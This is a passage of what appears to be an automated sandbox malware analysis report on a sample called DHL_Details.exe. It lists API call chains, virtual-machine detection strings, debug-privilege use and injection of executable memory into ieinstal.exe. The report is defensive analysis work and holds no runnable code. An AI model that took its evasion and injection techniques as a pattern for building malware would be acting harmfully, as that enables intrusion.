d@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t12_2_004104E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00407183 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00407183
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404648 _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_00404648
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_004126D3 wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_004126D3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00404AD4 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00404AD4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403315 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403315
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10536462 FindFirstFileW,FindNextFileW,FindClose,12_2_10536462
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10544061 FindFirstFileW,FindNextFileW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,FindClose,12_2_10544061
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10534CA3 FindFirstFileW,12_2_10534CA3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10538D9D getenv,FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindClose,FindClose,12_2_10538D9D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10541E6E FindFirstFileW,12_2_10541E6E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10538B11 getenv,FindFirstFileA,FindClose,GetLastError,GetLastError,FindClose,12_2_10538B11
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_10535FD6 _EH_prolog,socket,connect,_CxxThrowException,FindFirstFileW,_CxxThrowException,FindNextFileW,_CxxThrowException,_CxxThrowException,FindClose,atoi,_CxxThrowException,atoi,FindClose,RtlExitUserThread,12_2_10535FD6
Contains functionality to query local drivesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403B9A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403B9A
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW9r
Source: DHL_Details.exe, 00000000.00000002.1150176663.0000000000970000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Xgkuees.exe, 0000000F.00000002.1207823247.00000000007AC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
Source: DHL_Details.exe, 00000000.00000002.1150110460.000000000094A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(q
Source: reg.exe, 00000006.00000002.1130907172.0000000003410000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.1135620970.0000000003510000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Program exit pointsShow sources
Source: C:\Users\user\Xgku\Xgkuest.exeAPI call chain: ExitProcess graph end nodegraph_10-3859
Queries a list of all running processesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess information queried: ProcessInformation

Anti Debugging:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040F88B GdiplusStartup,LoadLibraryA,GetProcAddress,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,_itoa,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040F88B
Contains functionality to read the PEBShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105310CE mov eax, dword ptr fs:[00000030h]12_2_105310CE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_105310CE mov eax, dword ptr fs:[00000030h]12_2_105310CE
Enables debug privilegesShow sources
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 30D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3160000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3170000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3180000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 3190000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31A0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31B0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31C0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31D0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31E0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\DHL_Details.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 31F0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2570000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2800000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2810000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2820000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2830000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2840000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2850000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2860000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2870000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2880000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2890000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 10530000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A10000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AA0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AB0000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\Xgku\Xgkuees.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2AC0000 protect: page execute and read and writeJump to behavior
